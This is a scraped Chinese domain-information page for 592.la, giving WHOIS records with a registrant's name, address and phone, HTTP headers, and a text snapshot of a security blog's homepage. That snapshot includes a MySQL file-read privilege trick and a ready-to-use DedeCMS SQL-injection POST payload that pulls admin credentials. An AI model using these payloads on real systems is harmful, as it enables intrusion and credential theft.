网站综合信息 592.la
- 标题:
- Meiam's Home | Network security t
- 关键字:
- 描述:
- 域名信息
- 域名年龄:17年3个月5天 注册日期:2008年05月13日 到期时间:
邮箱:91270 电话:+1.18236855835
注册商:Dynadot LLC
- 服务器空间
- IP:162.159.210.12 同IP网站31个 详情
地址:美国 CloudFlare公司CDN网络节点
- 备案信息
- 备案号:
域名流量Alexa排名
域名注册Whois信息
592.la
域名年龄: 17年3个月5天注册时间: 2008-05-13
注 册 商: Dynadot LLC
注册邮箱: 91270
联系电话: +1.18236855835
获取时间: 2016年09月27日 02:14:54
Domain Name: 592.LA
Domain ID: D561778-LANIC
WHOIS Server: whois.nic.la
Referral URL:
Updated Date: 2016-03-17T16:18:08.0Z
Creation Date: 2008-05-13T23:12:21.0Z
Registry Expiry Date: 2017-05-13T23:59:59.0Z
Sponsoring Registrar: Dynadot LLC
Sponsoring Registrar IANA ID:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant ID: C44248600-LANIC
Registrant Name: Xu ZuHao
Registrant Organization: Meiams Home
Registrant Street: Jian She xi lu 3 hao luo 16 hao
Registrant City: JIaozuo
Registrant State/Province: Henan
Registrant Postal Code: 454000
Registrant Country: CN
Registrant Phone: +1.18236855835
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: 91270
Admin ID: C44248600-LANIC
Admin Name: Xu ZuHao
Admin Organization: Meiams Home
Admin Street: Jian She xi lu 3 hao luo 16 hao
Admin City: JIaozuo
Admin State/Province: Henan
Admin Postal Code: 454000
Admin Country: CN
Admin Phone: +1.18236855835
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: 91270
Tech ID: C44248600-LANIC
Tech Name: Xu ZuHao
Tech Organization: Meiams Home
Tech Street: Jian She xi lu 3 hao luo 16 hao
Tech City: JIaozuo
Tech State/Province: Henan
Tech Postal Code: 454000
Tech Country: CN
Tech Phone: +1.18236855835
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: 91270
Name Server: N178.NS.YUNJIASU.COM
Name Server: N1997.NS.YUNJIASU.COM
DNSSEC: unsigned
Billing ID: C44248600-LANIC
Billing Name: Xu ZuHao
Billing Organization: Meiams Home
Billing Street: Jian She xi lu 3 hao luo 16 hao
Billing City: JIaozuo
Billing State/Province: Henan
Billing Postal Code: 454000
Billing Country: CN
Billing Phone: +1.18236855835
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: 91270
>>> Last update of WHOIS database: 2016-09-26T18:18:02.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Access to the whois service is rate limited. For more information, please
see https://registrar-console.centralnic.com/pub/whois_guidance.
网站头文件(HTTP Header)
HTTP/1.1 200 OK 连接:关闭 访问时间:2015年02月21日 05:45:34 类型:text/html; charset=UTF-8 服务器:Microsoft-IIS/6.0 语言环境:ASP.NET 语言环境:PHP/5.2.17 X-Pingback: http://592.la/xmlrpc.php 设置Cookie:safedog-flow-item=655E379E4D8844DB9B18A3C15D3E0347; expires=Tue, 30-Mar-2151 00:56:50 GMT; domain=592.la; path=/ 网站编码:UTF-8
同IP网站(同服务器)
网站首页快照(纯文字版)
抓取时间:2016年09月27日 02:15:04
网址:http://592.la/
标题:Meiam's Home | Network security technology
关键字:
描述:
主体:
网址:http://592.la/
标题:Meiam's Home | Network security technology
关键字:
描述:
主体:
Mysql 漏洞利用(越权读取文件,实战怎么从低权限拿到root密码)2014 年 5 月 21 日安全技术No commentscnrstar (Be My Personal Best!) | 2014-05-20 21:58众所周知,Mysql的用户在没有File权限情况下是无法通过Load_file读文件或者通过into dumpfile 或者into outfile去写文件,但是偶尔在一个网站上发现个小技巧,也就是通过load data infile可以读取本地文件到数据库,这样子我们就可以在低权限下通过这个bug去读取服务器上的文件。代码如下:LOAD DATA LOCAL INFILE 'C:/boot.ini' INTO TABLE test FIELDS TERMINATED BY '';1LOAD DATA LOCAL INFILE 'C:/boot.ini' INTO TABLE test FIELDS TERMINATED BY '';后来我就一直想怎么利用这个问题。一个可行的思路如下:我们去读取mysql的数据库文件,mysql库的user表里存放着所有用户的hash,我们只要读取到这个文件,就差不多读取到了root的密码。于是本地测试,注意,我当前连接的用户test是没有File权限的:阅读全文..Delphi SAH256 字符串加密2014 年 4 月 24 日程序源码No commentsuses DCPsha256,function DigestToStr(Digest: array of byte): string;vari: Integer;beginResult := '';for i := 0 to Length(Digest) - 1 doResult := Result + uppercase(IntToHex(Digest[i], 2));end;function GetStringHash(Source: AnsiString): string;varHash: TDCP_sha256;Digest: array[0..31] of byte;beginHash := TDCP_sha256.Create(nil);Hash.Init;Hash.UpdateStr(Source);Hash.Final(Digest);Hash.Free;Result := DigestToStr(Digest);end;1234567891011121314151617181920212223uses DCPsha256, function DigestToStr(Digest: array of byte): string;var i: Integer;begin Result := ''; for i := 0 to Length(Digest) - 1 do Result := Result + uppercase(IntToHex(Digest[i], 2));end; function GetStringHash(Source: AnsiString): string;var Hash: TDCP_sha256; Digest: array[0..31] of byte;begin Hash := TDCP_sha256.Create(nil); Hash.Init; Hash.UpdateStr(Source); Hash.Final(Digest); Hash.Free; Result := DigestToStr(Digest);end;Delphi TStringList 分割字符串 过滤空格2014 年 4 月 24 日程序源码No commentsuses IdStringsvarsl: TStringList;str: string;i: Integer;beginstr := 'aa,b b,cc,dd';sl := TStringList.Create;SplitColumns(str, sl, ',');//该函数没有上述的BUGfor i := 0 to sl.Count - 1 doShowMessage(sl[i]);FreeAndNil(sl);end;12345678910111213uses IdStringsvarsl: TStringList;str: string;i: Integer;beginstr := 'aa,b b,cc,dd';sl := TStringList.Create;SplitColumns(str, sl, ',');//该函数没有上述的BUGfor i := 0 to sl.Count - 1 doShowMessage(sl[i]);FreeAndNil(sl);end;DedeCMS另一处全版本通杀SQL注入(无限制)2014 年 4 月 16 日安全技术One comment网站要支持申请友链/plus/flink_add.php直接填写验证码,抓包 ,修改POST数据Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\1Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\validate为验证码,修改提交即再打开友情链接plus/flink.php 有个无法显示的图片,查看源码 写了一个漏洞利用工具 下载: DEDECMS Web应用手工渗透测试——用SQLMap进行SQL盲注测试 2014 年 4 月 13 日 安全技术 No comments 简介 本文
最近查询网站